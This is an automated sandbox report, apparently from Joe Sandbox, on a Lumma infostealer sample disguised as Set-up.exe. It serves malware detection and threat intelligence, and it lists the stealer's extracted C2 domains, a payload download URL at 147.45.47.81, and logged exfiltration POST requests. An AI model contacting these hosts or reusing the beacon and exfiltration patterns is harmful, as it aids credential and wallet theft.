Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name: Set-up.exe
Analysis ID: 1551389
MD5: 206d3ede48db6abcd0887aab3442a590
SHA1: 8fcb9af4c1c4bb3af65aa5da2e12d9256b038e9e
SHA256: 835a32a57441be4b9f8861e80dd7a70c724c5024743d84fea0db6de46635e449
Tags: exe, lumma, LummaStealer, stealer, user-infosecn1nja
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Creates a DirectInput object (often for capturing keystrokes)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Set-up.exe (PID: 6544 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: 206D3EDE48DB6ABCD0887AAB3442A590)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["nightybinybz.shop", "moutheventushz.shop", "mutterissuen.shop", "conceszustyb.shop", "bakedstusteeb.shop", "standartedby.shop", "worddosofrm.shop", "corehairydu.icu", "respectabosiz.shop"], "Build id": "BVnUqo--@aboba45"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | 0x503a5:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: Set-up.exe PID: 6544 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: Set-up.exe PID: 6544 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
No Sigma rule has matched
          Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
          2024-11-07T17:39:24.473718+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.4 | 49735 | TCP
          2024-11-07T17:39:45.689040+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.4 | 56314 | TCP
          2024-11-07T17:39:47.147971+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.4 | 56315 | TCP
          2024-11-07T17:39:20.512582+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 104.21.16.142 | 443 | TCP
          2024-11-07T17:39:22.136265+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49734 | 104.21.16.142 | 443 | TCP
          2024-11-07T17:39:23.780419+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49736 | 104.21.16.142 | 443 | TCP
          2024-11-07T17:39:25.179012+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49740 | 104.21.16.142 | 443 | TCP
          2024-11-07T17:39:26.832488+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49742 | 104.21.16.142 | 443 | TCP
          2024-11-07T17:39:28.750013+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49744 | 104.21.16.142 | 443 | TCP
          2024-11-07T17:39:30.232631+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49745 | 104.21.16.142 | 443 | TCP
          2024-11-07T17:39:31.980700+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49746 | 104.21.16.142 | 443 | TCP
          2024-11-07T17:39:33.402164+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49747 | 104.21.16.142 | 443 | TCP
          2024-11-07T17:39:35.031255+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49748 | 104.21.16.142 | 443 | TCP
          2024-11-07T17:39:21.047264+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49733 | 104.21.16.142 | 443 | TCP
          2024-11-07T17:39:22.807473+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 104.21.16.142 | 443 | TCP
          2024-11-07T17:39:35.377073+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 104.21.16.142 | 443 | TCP
          2024-11-07T17:39:21.047264+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49733 | 104.21.16.142 | 443 | TCP
          2024-11-07T17:39:22.807473+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 104.21.16.142 | 443 | TCP
          2024-11-07T17:39:20.512582+0100 | 2057270 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49733 | 104.21.16.142 | 443 | TCP
          2024-11-07T17:39:22.136265+0100 | 2057270 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49734 | 104.21.16.142 | 443 | TCP
          2024-11-07T17:39:23.780419+0100 | 2057270 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49736 | 104.21.16.142 | 443 | TCP
          2024-11-07T17:39:25.179012+0100 | 2057270 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49740 | 104.21.16.142 | 443 | TCP
          2024-11-07T17:39:26.832488+0100 | 2057270 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49742 | 104.21.16.142 | 443 | TCP
          2024-11-07T17:39:28.750013+0100 | 2057270 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49744 | 104.21.16.142 | 443 | TCP
          2024-11-07T17:39:30.232631+0100 | 2057270 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49745 | 104.21.16.142 | 443 | TCP
          2024-11-07T17:39:31.980700+0100 | 2057270 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49746 | 104.21.16.142 | 443 | TCP
          2024-11-07T17:39:33.402164+0100 | 2057270 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49747 | 104.21.16.142 | 443 | TCP
          2024-11-07T17:39:35.031255+0100 | 2057270 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49748 | 104.21.16.142 | 443 | TCP
          2024-11-07T17:39:19.871748+0100 | 2057269 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 57108 | 1.1.1.1 | 53 | UDP
          2024-11-07T17:39:30.721297+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49745 | 104.21.16.142 | 443 | TCP

          AV Detection

          Source: https://worddosofrm.shop/;8r | Avira URL Cloud: Label: malware
          Source: https://worddosofrm.shop/? | Avira URL Cloud: Label: malware
          Source: https://worddosofrm.shop/apier | Avira URL Cloud: Label: malware
          Source: https://worddosofrm.shop:443/api2o4p.default-release/key4.dbPK | Avira URL Cloud: Label: malware
          Source: https://worddosofrm.shop/O | Avira URL Cloud: Label: malware
          Source: http://147.45.47.81/conhost.exe | Avira URL Cloud: Label: malware
          Source: https://worddosofrm.shop/: | Avira URL Cloud: Label: malware
          Source: https://worddosofrm.shop/8 | Avira URL Cloud: Label: malware
          Source: https://worddosofrm.shop/ | Avira URL Cloud: Label: malware
          Source: https://worddosofrm.shop/apibu | Avira URL Cloud: Label: malware
          Source: https://worddosofrm.shop/$ | Avira URL Cloud: Label: malware
          Source: https://worddosofrm.shop:443/api | Avira URL Cloud: Label: malware
          Source: http://147.45.47.81:80/conhost.exe | Avira URL Cloud: Label: malware
          Source: https://worddosofrm.shop/apis | Avira URL Cloud: Label: malware
          Source: https://worddosofrm.shop:443/api9 | Avira URL Cloud: Label: malware
          Source: https://worddosofrm.shop/api | Avira URL Cloud: Label: malware
          Source: Set-up.exe.6544.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["nightybinybz.shop", "moutheventushz.shop", "mutterissuen.shop", "conceszustyb.shop", "bakedstusteeb.shop", "standartedby.shop", "worddosofrm.shop", "corehairydu.icu", "respectabosiz.shop"], "Build id": "BVnUqo--@aboba45"}
          Source: Set-up.exe | ReversingLabs: Detection: 31%
          Source: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp | String decryptor output:
            • moutheventushz.shop
            • respectabosiz.shop
            • bakedstusteeb.shop
            • conceszustyb.shop
            • nightybinybz.shop
            • standartedby.shop
            • mutterissuen.shop
            • worddosofrm.shop
            • corehairydu.icu
            • lid=%s&j=%s&ver=4.0
            • TeslaBrowser/5.5
            • - Screen Resoluton:
            • - Physical Installed Memory:
            • Workgroup: -
            • BVnUqo--@aboba45
          Source: C:\Users\user\Desktop\Set-up.exe | Code function: 0_2_00E45980 InterlockedExchange, SwitchToThread, InterlockedExchange, InterlockedExchangeAdd, CryptAcquireContextA, InterlockedIncrement, GetLastError | 0_2_00E45980
          Source: C:\Users\user\Desktop\Set-up.exe | Code function: 0_2_00E45B40 InterlockedExchange, SwitchToThread, InterlockedExchange, InterlockedExchangeAdd, InterlockedDecrement, CryptReleaseContext | 0_2_00E45B40
          Source: C:\Users\user\Desktop\Set-up.exe | Code function: 0_2_00E45C00 InterlockedExchangeAdd, CryptGenRandom, GetLastError | 0_2_00E45C00
          Source: C:\Users\user\Desktop\Set-up.exe | Code function: 0_2_058F841D CryptUnprotectData | 0_2_058F841D
          Source: Set-up.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknown | HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49733 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49734 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49736 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49740 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49744 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49745 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49746 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49747 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49748 version: TLS 1.2
          Source: Set-up.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: Binary string: D:\Temp\BuildTemp\1.18_Windows_BUILD\ppsspp\PPSSPPWindows.pdb source: Set-up.exe
          Source: Binary string: D:\repos\main\SSH2\Release\pdbs\BvSshUpdate.pdb source: Set-up.exe
          Source: Binary string: updater.exe.pdb source: Set-up.exe
          Source: Binary string: D:\Temp\BuildTemp\1.18_Windows_BUILD\ppsspp\PPSSPPWindows.pdb& source: Set-up.exe

          Networking

          Source: Network trafficSuricata IDS: 2057270 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) : 192.168.2.4:49742 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2057270 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) : 192.168.2.4:49734 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2057269 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (worddosofrm .shop) : 192.168.2.4:57108 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057270 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) : 192.168.2.4:49747 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2057270 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) : 192.168.2.4:49745 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2057270 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) : 192.168.2.4:49748 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2057270 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) : 192.168.2.4:49733 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2057270 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) : 192.168.2.4:49740 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2057270 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) : 192.168.2.4:49736 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2057270 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) : 192.168.2.4:49744 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2057270 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) : 192.168.2.4:49746 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49733 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49734 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49745 -> 104.21.16.142:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49748 -> 104.21.16.142:443
          Source: Malware configuration extractorURLs: nightybinybz.shop
          Source: Malware configuration extractorURLs: moutheventushz.shop
          Source: Malware configuration extractorURLs: mutterissuen.shop
          Source: Malware configuration extractorURLs: conceszustyb.shop
          Source: Malware configuration extractorURLs: bakedstusteeb.shop
          Source: Malware configuration extractorURLs: standartedby.shop
          Source: Malware configuration extractorURLs: worddosofrm.shop
          Source: Malware configuration extractorURLs: corehairydu.icu
          Source: Malware configuration extractorURLs: respectabosiz.shop
          Source: Joe Sandbox ViewIP Address: 147.45.47.81 147.45.47.81
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update: 192.168.2.4:49742 -> 104.21.16.142:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update: 192.168.2.4:49734 -> 104.21.16.142:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update: 192.168.2.4:49747 -> 104.21.16.142:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update: 192.168.2.4:49748 -> 104.21.16.142:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update: 192.168.2.4:49733 -> 104.21.16.142:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update: 192.168.2.4:49740 -> 104.21.16.142:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update: 192.168.2.4:49736 -> 104.21.16.142:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update: 192.168.2.4:49744 -> 104.21.16.142:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update: 192.168.2.4:49745 -> 104.21.16.142:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update: 192.168.2.4:49746 -> 104.21.16.142:443
          Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow: 20.109.210.53:443 -> 192.168.2.4:49735
          Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow: 52.149.20.212:443 -> 192.168.2.4:56314
          Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow: 52.149.20.212:443 -> 192.168.2.4:56315
          Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: worddosofrm.shop
          Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 82 | Host: worddosofrm.shop
          Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=J0PC41K8W4FXK9GUKSTP | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18178 | Host: worddosofrm.shop
          Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=8F9JUVKTD98FLYNGQWCQ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8799 | Host: worddosofrm.shop
          Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=LQ7KQ0ZXPZEACXIL5P81AH845VEGG8T | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20518 | Host: worddosofrm.shop
          Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=FX1DFU84BK80CT6OHR9I3CQ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 7167 | Host: worddosofrm.shop
          Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=ALCFCPHXC9MFFVET4DI3NY | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 7129 | Host: worddosofrm.shop
          Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=4Y5L8AKJLU3H5MK5B6ICOFB232B8L7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1322 | Host: worddosofrm.shop
          Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=3EC22CYO6BIE0TIXW6C3VN | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1144 | Host: worddosofrm.shop
          Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 117 | Host: worddosofrm.shop
          Source: global traffic, HTTP traffic detected: GET /conhost.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: 147.45.47.81
          Source: unknown, TCP traffic detected without corresponding DNS query: 147.45.47.81
          Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global traffic, DNS traffic detected: DNS query: corehairydu.icu
          Source: global traffic, DNS traffic detected: DNS query: worddosofrm.shop
          Source: global traffic, DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
          Source: global traffic, DNS traffic detected: DNS query: 50.23.12.20.in-addr.arpa
          Source: unknown, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: worddosofrm.shop
          Source: unknown, HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49733 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49734 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49736 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49740 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49744 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49745 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49746 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49747 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 104.21.16.142:443 -> 192.168.2.4:49748 version: TLS 1.2
          Source: C:\Users\user\Desktop\Set-up.exe, Code function: 0_2_05911C40 OpenClipboard, GetWindowLongW, GetClipboardData, GlobalLock, GlobalUnlock, CloseClipboard
          Source: Set-up.exe, 00000000.00000003.1829704509.000000000639B000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: DirectInput8Create, memstr_b00aa0e9-f
          Source: Set-up.exe, 00000000.00000003.1829704509.000000000639B000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: GetRawInputData, memstr_9291059b-c

          System Summary

          Source: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759, Author: unknown
          Source: C:\Users\user\Desktop\Set-up.exe, Code function: 0_2_054C1BBB NtCreateSection, NtMapViewOfSection, VirtualAlloc, NtMapViewOfSection, VirtualProtect, VirtualProtect, VirtualProtect
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05472B8A0_2_05472B8A
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05472B910_2_05472B91
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0547CA580_2_0547CA58
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05472AEF0_2_05472AEF
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054ABAF80_2_054ABAF8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_059174900_2_05917490
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058F54400_2_058F5440
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_059214400_2_05921440
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058F43ED0_2_058F43ED
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05905D600_2_05905D60
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05920BF00_2_05920BF0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058E55F00_2_058E55F0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058EA5F00_2_058EA5F0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058E156D0_2_058E156D
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058E55600_2_058E5560
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_059014B00_2_059014B0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0590A4000_2_0590A400
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058E24510_2_058E2451
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_059037F80_2_059037F8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0591E7100_2_0591E710
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_059116400_2_05911640
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058ED6600_2_058ED660
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058EB6700_2_058EB670
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058EC1800_2_058EC180
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058EB1E00_2_058EB1E0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058EF1200_2_058EF120
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058EA1580_2_058EA158
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_059211600_2_05921160
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058E10000_2_058E1000
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058E13E40_2_058E13E4
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058E13190_2_058E1319
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058E13120_2_058E1312
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0591A2800_2_0591A280
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058FE2D00_2_058FE2D0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058E12770_2_058E1277
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058FFCD00_2_058FFCD0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058F0CFC0_2_058F0CFC
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058FBFD80_2_058FBFD8
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058E7FD00_2_058E7FD0
